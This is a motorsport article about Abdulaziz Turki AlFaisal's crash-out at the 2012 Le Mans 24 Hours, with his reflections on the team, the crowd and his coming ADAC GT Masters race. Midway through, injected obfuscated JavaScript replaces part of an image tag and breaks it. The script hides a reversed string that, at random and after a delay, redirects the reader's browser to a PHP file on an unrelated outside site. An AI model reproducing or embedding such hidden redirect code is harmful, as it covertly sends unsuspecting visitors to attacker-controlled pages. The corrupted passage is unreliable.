Abdulaziz Turki AlFaisal. Le Mans 24hrs 2012. “You Can Never Predict…”

Just as the early morning hours were rolling in, fate bit back again. Hard. With daylight still not fully up and fatigue beginning to take its toll, Abdulaziz – by his own admission – slid a tyre onto the dirty side of the track, and could do nothing but face the inevitable consequences.

“On my stint in the morning, I made a mistake going into the very fast Porsche corners. When you’re on the limit on such a long track and after so many hours, there’s only so far on the limit you can drive. I think I hit a dirty part of the track and the car just slid and I hit the wall. I couldn’t drive the car back to the pits, so we retired there on the spot. That was it. Game over.”

It’s a long journey home for from La Sarthe for Abdulaziz, and he’s certainly got a lot to think about. Interestingly though, the onus is not on ‘what might have been’ for the former GT3 European Champion. Both the company he’s kept during the last few days and the spirit of Le Mans itself is something he won’t forget in a hurry.

“I think our partnership worked really well. You need a consistency to a team to keep it all going, and when you’re consistent, you move up. Sean and I were moving up the ladder, our driver changes were really good and Bret [Curtis] was really coming into his own in the car. Yeah, I think the three of us performed very well together.

“But the feeling when everything finally starts, when you hear the engines roar as they cross the start line. You’ve been waiting five days for the show, and now it’s finally here. I think that’s the best feeling from Le Mans! And the crowd is unbelievable. I think we had more than 300,000 people around the track. And seeing at night the bonfires, the grills where people were camping even though it’s completely dark was just amazing. That’s really passion! Yeah, I look forward to doing this again.”

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/06/IMG_1604-728×485.jpg” alt=”” width=”728″ height=”485″ />

For now though, his focus lies on the season ahead. His Middle Eastern motorsport campaign may be done for another year, but his ADAC GT Masters commitments aren’t even half completed.

“I have the next race ADAC GT Masters which is in mid-July at the Nurburgring. So that’s the next focus. I’m heading home for a while to try and enjoy some hot weather and relax a bit. But I can’t wait to get back to racing.”
